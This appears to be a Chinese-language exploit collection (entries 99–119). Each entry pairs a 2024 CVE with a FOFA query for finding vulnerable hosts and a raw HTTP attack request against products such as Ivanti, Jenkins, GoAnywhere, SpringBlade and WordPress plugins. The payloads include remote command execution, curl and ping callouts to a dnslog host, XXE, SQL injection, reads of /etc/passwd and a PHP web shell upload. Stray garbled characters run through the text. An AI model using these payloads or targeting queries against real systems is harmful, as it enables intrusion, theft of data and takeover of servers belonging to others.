- h, A G0 h( E7 L- t- RContent-Type: application/x-www-form-urlencoded; charset=UTF-8& [* G0 {) M/ c1 V/ q" w, m, t
X-Requested-With: XMLHttpRequest: }: I# Y; S6 ^, j: Y+ r' {6 T! V
/ G9 G5 W: f6 c: J: O3 ^
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B9 Z5 c `: Y) K0 T0 M# `
' F- Z3 H, O$ _" p& R: N; s
4 _. o4 _8 }/ y. ^99. Ncast盈可视高清智能录播系统busiFacade RCE4 j4 \" h9 d* e
CVE-2024-0305
9 b0 Y9 ]6 F, A" [) KFOFA:app="Ncast-产品" && title=="高清智能录播系统"7 P2 s; d3 i6 F# ^( s
POST /classes/common/busiFacade.php HTTP/1.1$ h4 ~2 {3 p9 z3 v4 H
Host: 192.168.40.130:8080
/ G% Q5 _) R8 {7 n) LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* A0 N# s' h6 p% X0 sConnection: close
! Q/ u" f/ I8 {/ D4 m4 L+ _& hContent-Length: 154
6 H, e1 @* I# u& @4 l2 n/ ~Accept: */*" x% o$ q. ~# V7 O+ a' f
Accept-Encoding: gzip, deflate
+ N+ X0 p" z K. y5 B# EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) C" d& n3 S9 B3 _
Content-Type: application/x-www-form-urlencoded; charset=UTF-8$ B* G! K9 i/ M2 ]( A
X-Requested-With: XMLHttpRequest/ k5 a! x7 |2 k7 l. [3 L g
! P, }0 s1 z( M%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D r3 m# D/ a0 D0 ~) M4 ~7 F
) W' }6 E. T, o% C$ \# E, l J
$ }+ n+ m" ^- o) `0 m
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传6 a$ t4 \- }# [+ [- r5 L
CVE-2024-0352
& ^/ k4 M9 {5 pFOFA:icon_hash="874152924"' t( O: L5 t/ i( i+ g I3 [
POST /api/file/formimage HTTP/1.1
! b7 b, N/ u |7 mHost: 192.168.40.1305 e& U: m( t, ?0 b
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
" ?* \( I# n4 _$ k0 IConnection: close
- }: p F% Y1 y6 NContent-Length: 201
- ^- I V! X& |Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei) M( }/ h1 g2 _. L- C; M" \
Accept-Encoding: gzip
- g; {* k. G# \
o. k1 V/ L/ ]; D: w------WebKitFormBoundarygcflwtei( n2 O$ y# A9 w+ ]
Content-Disposition: form-data; name="file";filename="IE4MGP.php". v5 |8 ~; h3 z7 `' z* i4 }5 ^
Content-Type: application/x-php
+ Y' I8 E+ r0 j6 b; A8 W/ p; K! F& ^3 y' |7 o+ Y
2ayyhRXiAsKXL8olvF5s4qqyI2O/ t3 D& L1 @% x! r! [9 a. p: e
------WebKitFormBoundarygcflwtei--. j! c3 c6 Z6 g- v0 D) D! O- g9 |
* K) a7 }! n$ v" m8 |3 l
0 d i/ A) m7 f3 s101. ivanti policy secure-22.6命令注入
# U7 y; F1 G& n- l2 f4 z# T& pCVE-2024-21887
7 |: ?/ E7 O' K; C$ uFOFA:body="welcome.cgi?p=logo"2 b! D! p8 M, H+ N" q. O
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.10 R* z% F m' x. \- T1 n
Host: x.x.x.xx.x.x.x
9 J. j/ D5 A' i8 `+ YUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 a) _9 e$ S5 s' u6 J4 T L. H
Connection: close) M* k7 z% m7 V B$ r% W
Accept-Encoding: gzip! w& |. E: m( o* o! G
* i$ u9 z8 h( F q
1 G8 F6 w% u. x$ H# o! [# [ F102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
& F. }7 |+ K- o7 `CVE-2024-21893
# W! m5 Z+ `+ j. z5 m+ tFOFA:body="welcome.cgi?p=logo"- U1 u5 B/ i. y/ r! q$ ^
POST /dana-ws/saml20.ws HTTP/1.1, R: E/ O6 x/ @$ }: G
Host: x.x.x.x* Q8 K6 C3 i7 m( g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* `8 b# m5 L6 C" L
Connection: close
3 A. x$ D1 \7 ~# i, q6 _Content-Length: 792 l/ ^( _4 o( A; |
Accept-Encoding: gzip! x$ A. M" ]: y: k$ D. |: B
8 x% E7 Y/ v4 B
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
" R; b: w p9 o$ k/ l) c$ c: I2 v
* L, t6 ~* F9 U& o103. Ivanti Pulse Connect Secure VPN XXE
8 r1 b& d/ u7 u4 n T. A: FCVE-2024-22024
$ X) K) R r* t# A; }FOFA:body="welcome.cgi?p=logo"
4 Q7 h2 p b% m6 M7 |& ?POST /dana-na/auth/saml-sso.cgi HTTP/1.1
0 R5 G3 S8 k1 G" b3 {1 T5 vHost: 192.168.40.130:111
) L8 F9 B/ l7 c' e7 I7 ?User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36- @/ j) A1 o# n% g8 c, d
Connection: close( Q8 u& C9 \6 C, n% `1 v
Content-Length: 2046 f }0 b: ^8 f6 O
Content-Type: application/x-www-form-urlencoded
. m6 C' t; W& v- t' Y( U* DAccept-Encoding: gzip
: p3 q9 D9 S* R7 ~
0 C9 K% ?9 N7 Q4 O: z, `) L8 MSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==( Z) }. q" q. e3 w# a4 U
! l/ t9 f% I) g+ W! d, a
9 @/ i/ v; }; |2 _+ p其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
9 R0 L {- T! [; ?<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
# l5 y8 c1 V5 `4 X7 i- E; d
8 D& y" `: {; g9 h* q- w" F
5 X. X! D! E2 t# G+ Y- O104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
T- D) K' }' Z8 V, jCVE-2024-0569
; w: m& p1 Q( ^& [1 y0 @FOFA:title="TOTOLINK"% Z3 R5 _1 h( G% S) Y7 G& T
POST /cgi-bin/cstecgi.cgi HTTP/1.1
$ C3 Y1 J J* I( q; |* yHost:192.168.0.1
. \- m5 p$ Q) X8 s) LContent-Length:41
6 ] a* b! D. TAccept:application/json,text/javascript,*/*;q=0.010 T; ^& u$ b g" u; ?6 c
X-Requested-with: XMLHttpRequest
9 Z1 W5 Q7 _2 HUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.364 W( W4 r" X$ p& j
Content-Type: application/x-www-form-urlencoded:charset=UTF-80 {6 l2 M6 g L5 Q& D* t' |
Origin: http://192.168.0.1
$ L8 N) q% d% `/ e' AReferer: http://192.168.0.1/advance/index.html?time=1671152380564
3 c! ^7 ]1 ?* F9 w" D7 e1 vAccept-Encoding:gzip,deflate
- h$ L/ R4 f) s( uAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7$ f1 T* q+ g2 T
Connection:close
' r: h' N5 M$ c6 c: e0 x" P: p7 D8 ~' w. R9 i9 `2 k1 q1 ]/ I
{
; l/ I5 x- |( a. @"topicurl":"getSysStatusCfg",
; o+ w- j8 D% P' I% U"token":""
+ E6 `, i0 c8 D' i/ ]/ m6 s}
7 [3 V* \& l. ?
- x, O3 o: v( C8 s105. SpringBlade v3.2.0 export-user SQL 注入
+ I: b; W% j* k( RFOFA:body="https://bladex.vip"
3 ?0 n' b. J( n3 U0 [4 t& v1 uhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=17 w, N( f2 F! u
t+ Y7 b( f$ t9 _2 @
106. SpringBlade dict-biz/list SQL 注入7 [9 R$ s6 X5 x' Y9 e' c
FOFA:body="Saber 将不能正常工作"
- T( H& t% B( y8 Z* @& iGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
. O2 U" o- E4 MHost: your-ip7 b& F' i3 n7 @" f6 m! v' ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 h) x( _% K0 d" ~7 i& GBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A8 p( D: _' h* l% u ~) t
Accept-Encoding: gzip, deflate3 g$ f2 j6 Y2 u, j3 Y' D
Accept-Language: zh-CN,zh;q=0.9- C3 E4 z1 F4 r: O4 }
Connection: close9 `9 \* K; F& B W
1 Y8 i8 [$ t1 Q' A+ ^+ r: V- {
( W$ W! j: y4 E" |- l8 q
107. SpringBlade tenant/list SQL 注入0 C5 Z% ?; ]4 }
FOFA:body="https://bladex.vip"
( B5 R! a% x8 hGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.10 I+ n$ a) h* ^+ U& s6 |9 p
Host: your-ip
0 }" u" F/ J" z7 j" EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( ]2 W) o: A/ c1 O
Blade-Auth:替换为自己的8 U8 O9 n9 N* @$ q% J
Connection: close
" \% F) {! e3 R1 [5 X, T5 t# i# z2 G
1 m0 [5 |( N6 Z, ^+ T108. D-Tale 3.9.0 SSRF3 v3 X/ B/ r: Q
CVE-2024-216428 A# N4 ]4 Q# a" b, b6 |& Q& ^
FOFA:"dtale/static/images/favicon.png"0 {# p: o! D# X) q) s
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1/ F+ t/ t" }( @ H, E7 S
Host: your-ip
9 X3 H- ~( h/ ^2 g% w6 p* Z2 |Accept: application/json, text/plain, */*) H7 E! g' w7 s; b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 p8 J1 i* ?7 J. l* M# u) M2 zAccept-Encoding: gzip, deflate x) S/ j7 }% z: v6 y
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
& F; e4 E* } z' M) | T* FConnection: close
, I! ^. \. [1 D- ~' u- ], G! E7 [2 b4 s
( a5 l, N3 `8 m. y, W# U0 G
109. Jenkins CLI 任意文件读取) n$ S. a) e" g
CVE-2024-23897
4 \" q# i5 h( |8 n5 MFOFA:header="X-Jenkins"
% \ d, ]& W6 {% e* D( @4 g* MPOST /cli?remoting=false HTTP/1.1
) A" |; C# e E4 B1 }3 L- {Host:
! ^6 S3 ?" r/ \ u. G8 t9 h; aContent-type: application/octet-stream" q+ M {+ m" ^5 B# v, O; J
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
! q" j4 w7 }' K; Z' I; i8 ]% jSide: upload
, k+ r0 w, i, ZConnection: keep-alive+ `( ?& E1 I- x& J' J8 h
Content-Length: 163& g% _/ }/ v/ O) x/ e- g: w
" \; q2 S" D, i* Q/ F7 xb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
3 M- R/ T% ~4 i6 b; y6 Q U# Q! X; ~ ~# p8 H' L! s/ l* ~, ]' L8 m
( T/ n; o1 z6 _
POST /cli?remoting=false HTTP/1.1
# X% l. a! q/ {4 ?) bHost:7 _- @9 Y2 e0 _
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92) X" _8 q9 ~1 Q7 W' N
download
r( p* e: g7 cContent-Type: application/x-www-form-urlencoded
5 \# P) Q: G3 C v- h0 ?% [, U6 `Content-Length: 0
9 Q% z# M% v9 Z) B# v4 C1 @9 X8 i3 v: Z4 o6 @- A8 M
# Q/ e& L9 ]9 p2 ~0 i1 @5 m% L) h! C7 ZERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
- }8 g+ i. i- c; I0 qjava -jar jenkins-cli.jar help
& B* L! y5 x1 @[COMMAND]
- X; J I6 f nLists all the available commands or a detailed description of single command.. Q8 x% ~2 k* N8 h
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)) Z, p+ t3 V) [+ [: A" a/ h
: j3 `" A" t( V0 f# C1 [: `2 V
8 @, `% `- @$ g, g, k7 m
110. Goanywhere MFT 未授权创建管理员
6 t) C4 @; ~( i4 P R$ u+ _CVE-2024-0204, _$ |$ a5 m+ y6 e! j2 ^
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"3 }" p, W# [5 b5 m& x
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
4 L& @' I, y1 kHost: 192.168.40.130:8000
: H6 p% V7 M0 A2 B- A- IUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.361 g/ C! f& a2 K. V9 V# T
Connection: close" @3 a. ^* z6 t2 W
Accept: */*
! Z0 c! c6 R& X; m& ]- l0 |3 u5 \Accept-Language: en2 q- r8 P3 r$ i2 M8 S) Q$ W) |5 ?
Accept-Encoding: gzip
" i" ~' M; A* A2 h# A/ O3 a' |9 f
. L* {& j2 X) S+ j111. WordPress Plugin HTML5 Video Player SQL注入
8 Z* y* I$ Q9 J2 s( D& Y* {9 KCVE-2024-1061- a: V6 f7 c8 m
FOFA:"wordpress" && body="html5-video-player"
4 i* y" l" h9 m( V+ r1 y2 ^GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.14 P4 e) w" [. R+ q) Z
Host: 192.168.40.130:112
% B' N; { r: P) GUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
5 V0 c4 c$ {6 X" s( D/ SConnection: close, {7 q- P; Z Z- `" ?
Accept: */*
/ N5 s# `6 j; G/ }. i& f, QAccept-Language: en3 r& f1 }: A1 B# `% M+ O
Accept-Encoding: gzip
: J& I, [ n' Y9 G- t- D, y: [; ~4 q1 X1 [. @6 [3 ~3 _. X
' t3 }4 G* U& S: l) B. x: m112. WordPress Plugin NotificationX SQL 注入+ a. H9 _$ Q& g! Q
CVE-2024-1698
" y) I' \, n1 C) p+ H3 P1 eFOFA:body="/wp-content/plugins/notificationx"$ l9 |4 ^& F! g# q7 Q* n$ ^
POST /wp-json/notificationx/v1/analytics HTTP/1.1
$ A- R) r7 I0 aHost: {{Hostname}}
, }) ]" a: h' ?# H4 B& UContent-Type: application/json
+ f' @/ L6 r o8 @7 R4 `! E. k! q
3 V1 q5 ?8 e# q- Y, e$ ]{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}1 R) @* ?9 y, ?% L) Y5 Q; l* `& s
: C' [# D6 A4 O8 ?+ ^7 q7 _ A
+ }( f( O0 m# {113. WordPress Automatic 插件任意文件下载和SSRF
K: o1 y1 V4 ?* L6 ~& vCVE-2024-27954) c4 z ], V- y c( J
FOFA:"/wp-content/plugins/wp-automatic"
$ w2 W8 S/ }; jGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1. x, p" v! s; f5 Y
Host: x.x.x.x
% ^+ U. _: I6 u/ r5 MUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
" A9 V) x/ P: a- nConnection: close
- @, Z7 L; i5 L3 d% {- qAccept: */*
$ e6 ~# U' P$ W6 C% ~Accept-Language: en
7 R+ \5 e# W+ q' R$ u* c# AAccept-Encoding: gzip" m/ ?: V- l5 \6 U6 k
1 b; C5 q# T& o; p+ Z% T1 M# f, k2 j) k8 m8 H7 \* ]; E |& |# n6 B9 ?
114. WordPress MasterStudy LMS插件 SQL注入
3 s' {8 X: j6 U3 w' sFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
9 k8 t8 U( W, L+ q `6 iGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
0 m _- T- c9 ?7 WHost: your-ip- R' E! S8 ?3 \* i8 G, `9 z
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
$ O! _, v4 o2 X) o9 yAccept-Charset: utf-8
, w! @$ i* N( W) @0 B }: S" J9 uAccept-Encoding: gzip, deflate
$ _. c: R" _5 J: p+ @5 L5 U+ ]9 JConnection: close/ K6 G. C7 S3 d
& F/ ]0 {. @- a5 V; M& u3 H
: v4 r3 Z% m) B! m+ v# m3 A115. WordPress Bricks Builder <= 1.9.6 RCE
8 E/ i; C" N8 i6 U! M7 DCVE-2024-25600
$ \% R6 a r, aFOFA: body="/wp-content/themes/bricks/": c: R$ A6 C; ^3 N% _2 g
第一步,获取网站的nonce值0 D9 A- L$ Y3 P9 d7 c6 e2 N$ F) f) Z
GET / HTTP/1.1
6 \7 g" q& v, h% x( @; c/ rHost: x.x.x.x0 P% W$ ]% P0 O& m6 O
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.367 i; J' i0 F4 Q7 l; E8 o
Connection: close- w% x. O7 o% A9 S
Accept-Encoding: gzip
# k( Z; R2 A, S, {9 A( P! P% u4 X4 M( b
6 O4 r% o& ?* z" S第二步替换nonce值,执行命令
. j. B( w) ?6 p d4 o1 V$ M( iPOST /wp-json/bricks/v1/render_element HTTP/1.1
' F, W) T8 H' a# G2 zHost: x.x.x.x1 r7 e4 d3 |& f% ]% a1 }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
: A& P/ o" L3 x3 N1 s" F$ b( UConnection: close
. [7 @! N* c1 k* g( ^Content-Length: 3561 B$ [! u; Z. i& ^' ?; E: `
Content-Type: application/json3 |1 v2 U# c8 j8 M5 ]* {
Accept-Encoding: gzip/ Y& A3 s, i; u; m" r8 C
9 b. F/ c/ `7 {2 w# F{
1 T. a9 `8 Z2 S1 u"postId": "1",! X+ D s. q$ s% m3 k! c
"nonce": "第一步获得的值",. u6 A7 z( T! W2 G
"element": {, y5 j6 A* q9 P9 f/ w6 Q
"name": "container",, }) a: e: W6 {- o
"settings": {% s1 J, m+ R8 d6 A5 @* M* g
"hasLoop": "true", Q# f4 O, s9 o; [3 L: b
"query": {
4 M$ R* ~( D3 L* S- q4 @& q "useQueryEditor": true,
" _' I1 X3 |# t "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
8 y' _9 a/ }/ T% B. z5 o "objectType": "post"& n, X' D; e& c* E2 S
}6 F6 L, Z$ }8 _' i+ S8 l; }# h
}
. I* y y( _( K }
+ i- I: ^2 u5 H* u. I}. }* i' C- i2 n# W; A( n. v
+ L/ P, J0 w7 V+ _: |% q5 h* |/ M) r
116. wordpress js-support-ticket文件上传5 G0 T# N; q1 a3 j0 h/ n: L }% Q
FOFA:body="wp-content/plugins/js-support-ticket"
7 L8 W+ g3 v7 G9 I; HPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
& h O$ F$ _$ p& t! NHost:
# U+ H9 B0 o0 u1 u! D3 V1 o% e5 G2 HContent-Type: multipart/form-data; boundary=--------767099171 P4 _: l! V7 W( y& S/ A8 M0 Q, m! G
User-Agent: Mozilla/5.0
" w# G0 F- @2 E" K ~7 \2 |3 X& n
----------767099171" S: j. R8 Y& h: X, C
Content-Disposition: form-data; name="action"
9 \# F9 S) D/ N: E; i9 J2 A0 a# uconfiguration_saveconfiguration
# U+ {" v2 @* C8 t1 i8 G----------767099171 N! _& F1 Y- T) F4 R* S
Content-Disposition: form-data; name="form_request"
/ \ U$ ?. S( ^jssupportticket
; E! o) g+ L( T5 f( q! a----------767099171
) K* C, w( O5 Z3 {0 SContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php": v! Q. _0 O# H) J9 [* [8 _) Y# o
Content-Type: image/png; ?- R$ C; z$ c4 F
----------767099171--
, H. j$ b: Z9 R+ J: H* c: m( }% ?* O: p9 n
4 T9 j+ k) i# V2 Z2 D
117. WordPress LayerSlider插件SQL注入* Y6 C- n$ `; v( R5 q- g/ O
version:7.9.11 – 7.10.0
! ]. F3 @0 I& P" @FOFA:body="/wp-content/plugins/LayerSlider/"
# T0 m' I% t6 r; u# t ~GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
5 n- W( K5 E a: o# V" e( }Host: your-ip
$ i% q9 m) L& L4 h0 r+ s4 n; jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0: A9 j% B: N9 D6 r+ B! L( m# K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 d- l1 a9 c, @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, R6 c g6 L; a* L( vAccept-Encoding: gzip, deflate, br9 l$ ~/ k7 w/ q
Connection: close, l& @- t# i- \) [
Upgrade-Insecure-Requests: 1" P/ ]0 `2 Y' u6 ^- S3 d$ B) s; h
5 r4 F' r' x) y1 F( J
! g1 a3 U1 C: p. G118. 北京百绰智能S210管理平台uploadfile.php任意文件上传" a+ u( j) I: R8 c& S
CVE-2024-0939) i" ^8 h& O9 t' |: _1 F- o
FOFA:title="Smart管理平台"
5 l {- A, t2 FPOST /Tool/uploadfile.php? HTTP/1.1$ D( |, d: x. f
Host: 192.168.40.130:8443+ w' ?7 B; h" w; W& P) D/ D/ e6 i
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8! i# K2 q+ o- x" i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0# m% _+ `" R) p* r/ z7 g3 \ n; `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 ] A$ ~& p7 E% Z' k/ L* v- |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( h$ R. v5 J+ j, _6 h) }Accept-Encoding: gzip, deflate
i$ l5 Z+ H% x8 x, b! U' eContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
8 O# G; A8 q* y3 O; ~Content-Length: 4059 D V/ x& H! u/ D4 T$ P
Origin: https://192.168.40.130:8443
- A! n. q. H) e3 fReferer: https://192.168.40.130:8443/Tool/uploadfile.php
: |) N0 @& J* G) Z1 [Upgrade-Insecure-Requests: 14 T- c" o0 S* z
Sec-Fetch-Dest: document
. m: J' |6 f; d- nSec-Fetch-Mode: navigate
$ l( U! Y4 w! d) |5 ?Sec-Fetch-Site: same-origin. z. B! I7 p0 A" i6 l1 D
Sec-Fetch-User: ?1; w( M+ T, U% ^( P
Te: trailers, t8 |2 z, [' F. L
Connection: close
( M' g) m4 l8 E$ F: c7 d
# \" ]4 b) u+ s2 A: T7 m-----------------------------13979701222747646634037182887: C6 a; ~ \- W$ A9 J
Content-Disposition: form-data; name="file_upload"; filename="contents.php"/ q8 F+ C) U% Q. D T6 \+ P
Content-Type: application/octet-stream9 Q6 C# R% ]; X/ Q' T6 O( w9 V. Y
! ?3 D3 `3 Z3 Q9 i( U3 v5 S
<?php
2 |- [/ i; M+ E8 r" A, ]system($_POST["passwd"]);) [6 v2 C: t9 A! k+ I
?>
, c, y5 g1 k/ y8 N-----------------------------13979701222747646634037182887* f! y: S& w- F4 h
Content-Disposition: form-data; name="txt_path"1 z3 J* g0 |5 W* @
3 |7 j, p0 i) v+ @8 [/home/src.php* z I. V/ q, ~- e
-----------------------------13979701222747646634037182887--3 j4 S: c- T2 O; F
/ J V: O; Y- z! D8 G9 r+ p
4 }' g, F% u( D/ T
访问/home/src.php2 v/ p4 @6 ^- l4 g! o
: D6 ]. g% h; B# [0 Z119. 北京百绰智能S20后台sysmanageajax.php sql注入
- G) A5 ~, L! w. X6 C5 x3 ~/ I j/ L6 OCVE-2024-1254% m2 x! F+ c: G. J
FOFA:title="Smart管理平台"0 z0 x2 O+ i9 `& v# ~ J
先登录进入系统,默认账号密码为admin/admin
2 b( ~3 H8 A; `) aPOST /sysmanage/sysmanageajax.php HTTP/1.11/ Y+ V7 M3 i- X/ Y0 | f
Host: x.x.x.x
. ~; B2 R" x- W% R) L* j8 E6 tCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee$ z, v- U0 X+ w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
9 {# w* K, L9 ^) uAccept: */*
3 P* t" j5 h1 X) V% U6 A/ T$ pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% ~- k" @$ C" V& E( z6 f3 z& LAccept-Encoding: gzip, deflate
7 ?/ g. U0 S4 h4 ~+ qContent-Type: application/x-www-form-urlencoded;
6 _+ y8 ? _+ c* @Content-Length: 109
! X, J0 C3 a- l( JOrigin: https://58.18.133.60:8443: N, `& r- A) k L( } f2 U: s
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
# E. I3 k( d2 \ e/ A$ TSec-Fetch-Dest: empty- v. R" ^: s7 E$ C6 a
Sec-Fetch-Mode: cors
# p4 P9 w( ?8 U/ h3 n7 g2 BSec-Fetch-Site: same-origin3 {- g4 l2 S% F* e
X-Forwarded-For: 1.1.1.1
& w3 \: _( a1 eX-Originating-Ip: 1.1.1.1. A3 M$ Z8 t8 |% ]) j# V% u- ?
X-Remote-Ip: 1.1.1.1, N* l1 F1 T' @! [3 F8 w% b
X-Remote-Addr: 1.1.1.1
0 A# t) R$ Z4 c$ T0 NTe: trailers7 Y) L! K* y! y- p0 T
Connection: close2 U5 s7 v/ E1 |5 m
& m; ?$ A5 `, [$ p- x( e
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
! Z3 _' K, ^# B: n8 @' I8 W; E2 B* ~+ i5 n$ Q7 m
